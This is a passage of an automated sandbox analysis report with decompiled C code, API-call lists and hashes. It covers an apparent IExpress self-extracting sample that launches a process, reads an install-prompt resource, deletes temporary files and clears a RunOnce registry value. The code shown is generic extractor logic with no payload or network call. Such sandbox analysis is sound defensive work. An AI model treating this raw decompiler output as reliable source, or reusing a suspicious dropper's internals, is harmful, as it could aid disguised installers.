                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-394614654
                                                                                                                                                                                                                                            • Opcode ID: eedb48513b94008da1a528b1af592f2c33b89c6216a384a6d2e45c15aef5392c
                                                                                                                                                                                                                                            • Instruction ID: b6db20f54a5770bb6dd566dbcb19bb52f17e30fe2b23cae3fe78ea5cf56fef1d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eedb48513b94008da1a528b1af592f2c33b89c6216a384a6d2e45c15aef5392c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA11E671B0021077DB249FB96C4EA9B7ED9EF46360B104617B505D7191DE70980687A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 631 a93fef-a94010 632 a9410a-a9411a call a96ce0 631->632 633 a94016-a9403b CreateProcessA 631->633 634 a94041-a9406e WaitForSingleObject GetExitCodeProcess 633->634 635 a940c4-a94101 call a96285 GetLastError FormatMessageA call a944b9 633->635 638 a94091 call a9411b 634->638 639 a94070-a94077 634->639 647 a94106 635->647 646 a94096-a940b8 CloseHandle * 2 638->646 639->638 642 a94079-a9407b 639->642 642->638 645 a9407d-a94089 642->645 645->638 648 a9408b 645->648 649 a94108 646->649 650 a940ba-a940c0 646->650 647->649 648->638 649->632 650->649 651 a940c2 650->651 651->647
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E00A93FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E00A96CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0xa98a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0xa99a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0xa99a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A9411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0xa99a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00A94033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A94049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00A9405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A9409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A940A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A940DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A940E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: b1b0db4a7c758e8f11705375a9a80065e8f37ba74dabf1866df49998227ef6a5
                                                                                                                                                                                                                                            • Instruction ID: 649ba6ec411f29755cb86668b98fbbd553266052fdb9c4b67712aa9d0dc5b667
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1b0db4a7c758e8f11705375a9a80065e8f37ba74dabf1866df49998227ef6a5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E31AF31740208ABEF209BA5DC49FAB77B8EB98700F2002ABF505D2160CE344C83CA51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 652 a951e5-a9520b call a9468f LocalAlloc 655 a9522d-a9523c call a9468f 652->655 656 a9520d-a95228 call a944b9 call a96285 652->656 662 a9523e-a95260 call a944b9 LocalFree 655->662 663 a95262-a95270 lstrcmpA 655->663 671 a952b0 656->671 662->671 664 a9527e-a9529c call a944b9 LocalFree 663->664 665 a95272-a95273 LocalFree 663->665 674 a9529e-a952a4 664->674 675 a952a6 664->675 669 a95279-a9527c 665->669 672 a952b2-a952b5 669->672 671->672 674->669 675->671
                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A951E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E00A9468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E00A9468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E00A944B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0xa99124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0xa99124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F4D,?,00000002,00000000), ref: 00A95201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A95250
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: 90bd9056e41e51fab5296e7db5ea6eec52023d6c5d3851427d8dae0fab89fa76
                                                                                                                                                                                                                                            • Instruction ID: d13b387dfa6694a32ffb6a6644f15a638ebaaab004fe25faf94247dee9a53c51
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90bd9056e41e51fab5296e7db5ea6eec52023d6c5d3851427d8dae0fab89fa76
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF11E6B1B006017BDF55ABB55D4AF7B61EDEBDD340B10442FB602D5190DE788C024264
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E00A952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0xa991e0; // 0x7c8d90
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0xa98a24 == 0 &&  *0xa99a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0xa98a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0xa98a24 == 0 &&  *0xa99a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E00A91781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            					if(( *0xa99a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E00A965E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E00A92390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0xa98a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0xa99a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E00A91FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0xa98a20 =  *0xa98a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E00A96CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(007C8D90,00000080,?,00000000), ref: 00A952F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(007C8D90), ref: 00A952FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(007C8D90,?,00000000), ref: 00A95305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(007C8D90), ref: 00A9530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00A911FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A95363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A95334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-1610346413
                                                                                                                                                                                                                                            • Opcode ID: d552b8497429f960642a32042e7c6f85c6b7d6fd1333ae6b9ef742a1f51ac408
                                                                                                                                                                                                                                            • Instruction ID: a312f06bb88c8a8486a8d93cdd3a52ee05c340da98bff0678e48864552fdbb6a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d552b8497429f960642a32042e7c6f85c6b7d6fd1333ae6b9ef742a1f51ac408
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9721AE31B00614EBDF22DBB4ED1AB6A77E4FB14790F04025BE8469A5A0CFB45C86CB84
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A91FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0xa98530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A9538C,?,?,00A9538C), ref: 00A92005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(00A9538C,wextract_cleanup2,?,?,00A9538C), ref: 00A92017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00A9538C,?,?,00A9538C), ref: 00A92020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                            • Opcode ID: 1b9a31da2d4186c0842ea8758fdef947e2870fc1ab8b700e40246f2b5142e5bd
                                                                                                                                                                                                                                            • Instruction ID: 143594f1e4402c041475459e99bee38d147c74548b5dab5d26b20b65bf4c800c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b9a31da2d4186c0842ea8758fdef947e2870fc1ab8b700e40246f2b5142e5bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E01A30750218BBDB218BD0AC0AF697AA9F711741F100197B905A0060EF655E15D645
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A94CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0xa991d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E00A94E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E00A96CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0xa991e4;
                                                                                                                                                                                                                                            						_t58 = 0xa991e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - 0xa991e5;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa991e4;
                                                                                                                                                                                                                                            						_t30 = E00A94702( &_v268, 0xa991e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E00A9476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E00A94980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A947E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa993f4 =  *0xa993f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0xa991e4;
                                                                                                                                                                                                                                            						_t63 = 0xa991e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - 0xa991e5;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
